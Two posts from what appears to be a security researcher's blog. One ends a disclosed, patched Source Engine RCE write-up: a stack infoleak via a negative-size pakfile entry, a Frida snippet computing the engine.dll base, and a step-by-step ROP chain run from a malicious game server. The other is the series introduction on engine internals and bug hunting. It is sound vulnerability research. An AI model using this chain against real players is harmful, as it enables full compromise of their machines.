A stack buffer of size 0x100 is used to read contents of the file in 0x100 sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent Anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

image-20200506163703366

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

image-20200506171807825

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

image-20200506164957309

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4) therefore it was easily selectable from the list of DWORDS. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, now we have both a pointer leak and an arbitrary execute bug. These two are sufficient enough for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll so the pointer sv_download_url->m_pszString is now at an attacker known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 4. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 7.

  10. Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 4. The ROP chain then begins execution. The chain will load necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl given in Step 6. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the users files and data.

And there you have it. This entire exploitation happens automatically, and does so by using Frida to inject into the dedicated server process to instrument to do all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action, be sure to full screen it so it’s easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

But sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and its networking protocol it uses is magnitudes more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam running creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Exploiting the Source Engine (Part 1)

2 August 2018 at 00:00

Introduction

It’s been a long time coming, but here’s my first post on a series about finding and exploiting bugs in Valve Software’s Source Engine. I was first introduced to it through the sandbox game Garry’s Mod in 2010, which introduced me to the field of reverse engineering and paved the way for my favorite hobby, my education, and my eventual employment.

I took a long hiatus from working with the Source Engine when I went to college and got involved obsessed with playing CTF competitions, a type of competition where participants solve challenges that mimic real-world reverse engineering and exploitation tasks. One day, I saw a post made about a TF2 RCE proof-of-concept released against the engine. To be honest, the bug and the exploit was very simple, and nothing more difficult than some of the intermediate challenges one would find in a good CTF. With that knowledge under my belt, I decided to prove myself and come back to the Source Engine with the goal of finding a true Remote Code Execution (RCE).

As it turns out, this was around the time that Valve released their Bug Bounty program through HackerOne, where they boasted a bounty range of $1,000 - $25,000 for these kind of bugs. With a bit of luck, I successfully found and wrote a proof-of-concept for a critical Server to Client RCE bug, and was given a generous bounty of $15,000 from Valve. Everything in this series is dedicated to information I’ve learned along the way about the engine.

NOTE: As of writing, the vulnerability has not been publicly disclosed. I will be doing a writeup of the bug and exploit chain if/when it goes public.

image-20180802185147009
Source games Dota 2, CS:GO, and TF2 continue to hold top active player counts on Steam.

The Source Engine

The Source Engine is a third generation derivative of the famous Quake Engine from 1999 and the Valve’s own GoldSrc engine (the HL1 engine). The engine itself has been used to create some of the most famous FPS game series’ in history, including Half-Life, Team Fortress, Portal, and Counter Strike.

Timeline:

  • 1998 - Valve showcases GoldSrc, a heavily modified Quake engine.
  • 2004 - Valve releases the Source Engine based on GoldSrc.
  • 2007 - The source code to the Source Engine is leaked.
  • 2012 - CS:GO is released, and with it, “Source 1.5” begins development.
  • 2013 - Valve releases the public 2013 SDK for the TF2/CS:S engine containing most of the code necessary to write games for the engine.
  • 2015 - The “Reborn” update for Dota 2 brings the first Source 2 game to market.
  • 2018 - Valve opens their HackerOne program to the public.

The Code:

The first thing that I didn’t truly appreciate about this engine (and other engines in general) is how large it is. The engine is gigantic, featuring millions of lines of C++ code to develop, render, and run games of all types (but mostly first-person games).

The code itself is old and unmaintained. Most of the code was very obviously rushed out to meet deadlines, and honestly it is a huge surprise that the engine even functions at all. This is not unique to Valve, and is very typical in the game development world.

Assets such as models, particles, and maps are all built and run using custom file formats developed by Valve or extended from Quake (yes, file format parsers from 1999). There are still usages of obviously unsafe functions such as strcpy and sprintf, and in general the engine itself has a history of “add, add, add” and very little maintenance.

A lot of the C++ classes included in the engine are straight up dead code. Big features were designed and developed, yet only used for very small parts of the engine. The 2013 SDK tools themselves still have difficulty building valid files for their current engine versions of the engine. Classes derive from anywhere from one to nine or more different base classes, and tend to feature a never-ending maze of abstractions on abstractions. Navigating this codebase is time consuming and generally unpleasant for beginners. All in all, the engine is due for a legacy code rewrite that will likely never happen.

Intro to Source Games:

Source Engine games consists of two separate parts, the engine and the game.

The engine consists of all of the typical game engine features like rendering, networking, the asset loaders for models and materials, and the physics engine. When I refer to the Source Engine, I am referring to this part of the game. The bulk of the engine’s code is found in engine.dll, which is found in the path /bin/engine.dll from the game’s root. This same base code is used in some manner across all SE games, and is typically utilized by 3rd party game developers in its pre-compiled form. The code for the Source Engine was leaked (luckily) as part of the 2007 Valve leak, and this leak is all the code that is available to the public for the engine.

The second part, the game, consists of two main parts, client.dll and server.dll. These binaries contain the compiled game that will use the engine. Both of these dlls will utilize engine.dll heavily in order to function. Inside of client.dll, you will find the code responsible for the GUI subsystem (named VGUI) of the game and the clientside logic of the actual game itself. Inside of server.dll, you will find all of the code to communicate the game’s serverside logic to the remote player’s client.dll. Both of these dlls are found in /[gamedir]/bin/*.dll, where [gamedir] is the game abbreviation (csgo, tf2, etc.).

Both the server and client have shared code that defines the entities of the game and variables that will be synchronized. Shared code is compiled directly into each binary, but some C macro design ensures that only the server parts compile to server.dll, and vice-versa. The engine.dll entity system will synchronize the server’s simulation of the game, and the client’s dll will take these simulations and display them to the player through the engine.dll renderer.

Lastly, a big feature of all Source games that was taken and evolved from the Quake engine is the ConVar system. This system defines a series of variables and commands that are executed on an internal command line, very similar to a cmd.exe or /bin/sh shell. The difference is that, instead of executing new processes, these commands will run functions on either the client or server depending on where its run. The engine defines some low-level ConVars found on both the server and client, while the game dlls add more on top of that depending on the game dll that’s running.

  • A Console Variable (ConVar) takes the form of <name> <value>, where the value can be numerical or string based. Typically used for configuration, certain special ConVars will be synchronized. The server can always request the value of a client’s ConVar. Example: sv_cheats 1 sets the ConVar sv_cheats to 1, which enables cheats.
  • A Console Command (ConCommand) takes the form of <name> <arg0> <arg1> …, and defines a command with a backing C++ function that can be run from the developer console. Sometimes, it is used by the game or the engine to run remote functions (client -> server, server -> client). Example: changelevel de_dust executes the command changelevel with the argument de_dust, which changes the current map when run on the server console.

This is just an intro, more on all of this to follow in future posts.

The Bugs:

All of this old code and custom formats is fantastic for a bug hunter. In 2018, all that’s truly necessary to perform a full chain RCE is a good memory corruption bug to take control and an information leak to bypass ASLR. Typically, the former is the most difficult part of bug hunting in modern software, but later you will see that, for the SE, it is actually the latter.

Here is an overview of the Windows binaries:

  • 32-bit binaries
  • NX - Enabled
  • Full ASLR - Enabled (recently)
  • Stack Cookies - Disabled (in the cases it matters)

If you’re an exploit developer, you would probably find the lack of stack cookies in a game engine with millions of players to be a very shocking discovery. This is a vital shortcoming of the already aging engine, and is essentially unheard of in modern Windows binaries. Valve is well aware of this protection’s existence, and has chosen time and time again not to enable it. I have some speculation as to why this is not enabled (most likely performance or build breaking issues), but regardless, there is a huge point to make: Any controllable stack overflow can overwrite the instruction pointer and divert code execution.

Considering how much the stack is used in this engine, this is a huge benefit to bug hunters. One simple out-of-bounds (OOB) string copy, such as a call to strcpy, will result in swift compromise of the instruction pointer straight into RCE. My first bug, unsurprisingly, is a stack overflow bug, not much different than you would find in a beginner level CTF challenge. But, unlike the CTF, its implications of a full client machine compromise in a series of games with a huge player base leads to the large payout.

Hunting:

When hunting for these bugs, I chose to take a slightly more difficult path of only performing manual code auditing on the publicly available engine code. What this allows me to do is both search for potentially useful bugs and also learn the engine’s internals along the way. While it might be enticing for me to just fuzz a file format and get lots of crashes, fuzzing tends to find surface level bugs that everyone’s finding, and never those really deep, interesting bugs that no one is finding.

As I said previously, the codebase for this engine is gigantic. You should take advantage of all of the tools available to you when searching. My preferred toolset is this:

  • Following code structure and searches using Visual Studio with Resharper++.
  • Cmder (with grep) to search for patterns.
  • IDA Pro to prove the existence of the bug in the newest build.
  • WinDbg and x64dbg to attach to the game and try to trigger the bug.
  • Sourcemod extensions to modify the server for proof-of-concepts

With these tools, my general “process” for bug hunting is this:

  1. Find some section of the client code I feel is exploitable and want to look into more closely

  2. Start reading code. I’ll read for hours until I come across what I think is a possible exploitable bug.

  3. From there, I will open up IDA Pro and locate the function I think is exploitable, then compare its current code with the old, public code I have available.

  4. If it still appears to be exploitable, I will try to find some method to trigger the exploitable function from in-game. This turns out to be one of the hardest parts of the process, because finding a triggerable path to that function is a very difficult task given the size of the engine. Sometimes, the server just can’t trigger the bug remotely. Some familiarity with the engine goes a long way here.

  5. Lastly, I will write Sourcemod plugins that will help me trigger it from a game server to the client, hoping to finally prove the existence of the bug and the exploitability in a proof-of-concept.

Next Time

Next post, I will go more in-depth into the codebase of the Engine and explain the entity and networking system that the Engine utilizes to run the game itself. Also, I will begin introducing some of the techniques I used to write the exploits, including the ASLR and NX bypass. There’s a whole lot more to talk about, and this post barely scratches the service. At the moment, I’m in the process of working on a new undisclosed bug in the engine. Hoping to turn this one into another big payout. Wish me luck!

— Gbps

❌
❌